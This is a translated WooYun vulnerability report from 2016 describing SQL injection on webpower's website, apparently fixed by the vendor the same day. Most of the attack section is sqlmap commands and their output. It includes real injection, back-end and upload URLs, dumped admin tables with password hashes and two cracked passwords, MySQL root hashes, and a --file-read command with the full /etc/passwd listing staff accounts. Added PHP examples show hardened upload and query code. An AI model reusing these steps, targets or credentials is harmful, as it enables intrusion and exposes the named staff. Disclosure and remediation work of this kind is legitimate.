
Vulnerability summary

Defect ID: wooyun-2016-0192360

Title: SQL injection vulnerability on the webpower official site; back end accessed, database root privileges

Vendor: webpower

Author: whoamiecho

Submitted: 2016-04-05 11:58

Fixed: 2016-04-05 16:23

Published: 2016-04-05 16:23

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-05: Details sent to the vendor, awaiting vendor response
2016-04-05: Vendor confirmed; details disclosed to the vendor only
2016-04-05: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

SQL injection vulnerability on the webpower official site; back end accessed, database root privileges

Detailed description:

Asking for an invite code:
Injection point:
http://www.webpowerasia.com/m/con.php?id=11
Tested with sqlmap:

QQ截图20160404124627.png


Quite a few databases:

available databases [19]:
[*] information_schema
[*] k11_birthday
[*] k11_optin
[*] ktest
[*] mysql
[*] phpmyadmin
[*] site_xbox
[*] task
[*] ued_wiki
[*] webpower_website
[*] wechat_site
[*] wp-e-sight
[*] wp-e-sight-en
[*] wp_e-home
[*] wp_faq
[*] wp_task
[*] wp_tl-group
[*] wp_webpowerasia
[*] wp_website


Let's take the site first:
Try to locate the site's database and obtain the back-end username and password:

Database: wp_webpowerasia
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Database: wp_webpowerasia
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Database: wp_webpowerasia
Table: manage_admin
[1 entry]
+----------+----------------------------------+
| username | userpassword |
+----------+----------------------------------+
| admin | 6966fe537468bb6a170b3c40ba22538d |
+----------+----------------------------------+


The hash cracks to: webp0wer
This gives the back end:
http://www.webpowerasia.com/manage/index.php
Try logging in:

QQ截图20160404130741.jpg


The site has two upload paths. One is the editor, CKEditor 3.2.1 (revision 5372), which lets you change the uploaded file name; the other is custom-written.
The latter allows arbitrary file upload:

QQ截图20160404131452.jpg

QQ截图20160404130710.jpg


http://www.webpowerasia.com//uploadfile/201604/20160404010622.txt

QQ截图20160404130647.jpg


The upload endpoint can be reached without authorization:
http://www.webpowerasia.com//manage/post/up_pic.php
The site's absolute path, obtained through the back end:
/var/www/html/webpowerasia
So let's read files through the injection:
sqlmap.py -u "http://www.webpowerasia.com/m/con.php?id=29" --file-read "etc/passwd"
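For contrast with the two weaknesses just described (an upload endpoint reachable without a login, and a client-controlled file name), here is an added example of a hardened image-upload handler. It is not the site's own up_pic.php and not code from the report; the session key `admin_id`, the field name `file` and the directory `/var/www/uploads` are assumptions.

```php
<?php
// Added example (not the site's up_pic.php): an upload handler hardened against
// unauthenticated access and client-controlled names/types.
// Assumed: $_SESSION['admin_id'] is set at back-end login, the form field is
// "file", and /var/www/uploads is served as static content only.
declare(strict_types=1);

session_start();

function deny(int $status, string $msg): void
{
    http_response_code($status);
    exit($msg);
}

// 1. Authentication first: the report found the endpoint reachable without a login.
if (empty($_SESSION['admin_id'])) {
    deny(403, 'login required');
}

// 2. Only accept a genuine multipart upload.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !isset($_FILES['file'])
    || $_FILES['file']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    deny(400, 'bad request');
}
$tmp = $_FILES['file']['tmp_name'];

// 3. Allow-list the type by inspecting the bytes, never the client-supplied name
//    or Content-Type header; the server derives the extension from the detected type.
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
if (!isset($allowed[$mime]) || @getimagesize($tmp) === false) {
    deny(415, 'only JPEG, PNG or GIF images are accepted');
}
if (filesize($tmp) > 2 * 1024 * 1024) {
    deny(413, 'file too large');
}

// 4. Random, server-chosen file name. The directory is assumed to have script
//    execution disabled (or to sit outside the document root), so even a
//    mis-detected file cannot be run as PHP.
$uploadDir = '/var/www/uploads'; // assumed path
$name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
if (!move_uploaded_file($tmp, $uploadDir . '/' . $name)) {
    deny(500, 'could not store file');
}

header('Content-Type: application/json');
echo json_encode(['file' => $name]);
```

The order matters: the session check runs before any file is touched, the type decision uses the file contents rather than the name the editor lets the user set, and the stored name is never derived from client input, which closes the "modify the uploaded file name" path the report mentions for CKEditor.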

QQ截图20160404132000.jpg


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin


QQ截图20160404133043.jpg


The database usernames and password hashes can also be pulled; here is some other data as well:

database management system users password hashes:
[*] alonso.chen [1]:
password hash: *80F2C54DD0E8548D01BCA1D75AB6E4A5FD1AA7BF
[*] root [2]:
password hash: *51BBF7BD5C01E0212ED1EC596FA7CCE962AA1B33
password hash: NULL



Database: wp_website
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Table: manage_admin
[1 entry]
+---------------+----------------------------------+
| username | userpassword |
+---------------+----------------------------------+
| webpowerchina | 1309112725a40e38aa14e35e3a50a53c |
+---------------+----------------------------------+

Database: wp_faq
Table: manage_admin
[9 entries]
+-------------+----------------------------------+
| username | userpassword |
+-------------+----------------------------------+
| admin | 6f292abc57aa3dde9ef9886c590d26f3 | Webpower1
| wp_leo | 6966fe537468bb6a170b3c40ba22538d |
| nicole.shen | b56e0b4ea4962283bee762525c2d490f |
| van.fan | 6966fe537468bb6a170b3c40ba22538d |
| monica.sun | 6966fe537468bb6a170b3c40ba22538d |
| joyce.huang | 76e2e42643666620948c29cc8ca48f78 |
| allen.jing | 4f066b79b7ffe87cb953536d470b07e0 |
| cathy | 25d55ad283aa400af464c76d713c07ad |
| <blank> | d41d8cd98f00b204e9800998ecf8427e |

Proof of vulnerability:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin

Remediation:

Filter the input.
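The one-word remediation above, made concrete as an added example. This is not the site's actual code: it is a hypothetical reconstruction of the pattern behind `/m/con.php?id=11` next to a hardened replacement. The table `manage_post` comes from the report's table list; the columns `title` and `content`, the account `web_ro` and the `DB_PASS` environment variable are assumptions.

```php
<?php
// Added example, not the site's actual code: a hypothetical reconstruction of the
// injectable pattern behind /m/con.php?id=11 beside a hardened replacement.
// manage_post is from the report's table list; title/content are assumed columns.
declare(strict_types=1);

// BEFORE: the id parameter is concatenated into the query, so whatever is placed
// in ?id= is parsed as SQL. This is the defect the report exploited with sqlmap.
function fetchPostVulnerable(PDO $db, string $id): array
{
    $sql = "SELECT id, title, content FROM manage_post WHERE id = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER: validate the type, then bind the value so it can never be parsed as SQL.
function fetchPostSafe(PDO $db, ?string $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare('SELECT id, title, content FROM manage_post WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Least privilege at the connection. The report shows the site's database user
// was root, which is what turned one injection into a listing of 19 databases
// and --file-read of /etc/passwd. A read-only account without the FILE privilege,
// e.g.
//   CREATE USER 'web_ro'@'localhost' IDENTIFIED BY '...';
//   GRANT SELECT ON wp_webpowerasia.* TO 'web_ro'@'localhost';
// limits the damage if another query ever slips through.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=wp_webpowerasia;charset=utf8mb4',
    'web_ro',                 // assumed account name
    getenv('DB_PASS') ?: '',  // assumed: secret supplied via environment
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$rows = fetchPostSafe($db, $_GET['id'] ?? null);
header('Content-Type: application/json');
echo json_encode($rows);
```

Two details are doing the work. `FILTER_VALIDATE_INT` rejects anything that is not a plain positive integer before the database is involved, and the bound parameter means the value is sent separately from the query text, so "filtering" no longer depends on guessing which characters an attacker might use. The account change is independent of the code fix and addresses the second half of the report's title: without FILE and without access to the other 18 databases, an injection in one page cannot reach /etc/passwd or the other sites' admin tables.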

Copyright notice: when reposting, credit the source whoamiecho@乌云


Vendor response

Vendor reply:

Severity: Medium

Rank: 5

Confirmed at: 2016-04-05 12:52

Vendor comment:

Fix in progress

Latest status:

2016-04-05: fixed


Comments:

  1. 2016-04-06 14:14 | Dotaer ( Passerby | Rank:16 Vulns:3 | Learn more, dig more holes! )

    This skilled and you still need an invite code? Which big shot's alt account is this?

  2. 2016-04-07 19:47 | Soulmk ( Intern white hat | Rank:42 Vulns:11 | Quietly learning, seeking growth~ )

    Back when I reported it they restricted back-end login; now it's unrestricted again.... Are they even going to fix this hole...

  3. 2016-04-08 16:29 | whoamiecho ( Passerby | Rank:2 Vulns:1 | xxx)

    rp, haha

  4. 2016-04-08 16:29 | whoamiecho ( Passerby | Rank:2 Vulns:1 | xxx)

    @Soulmk rp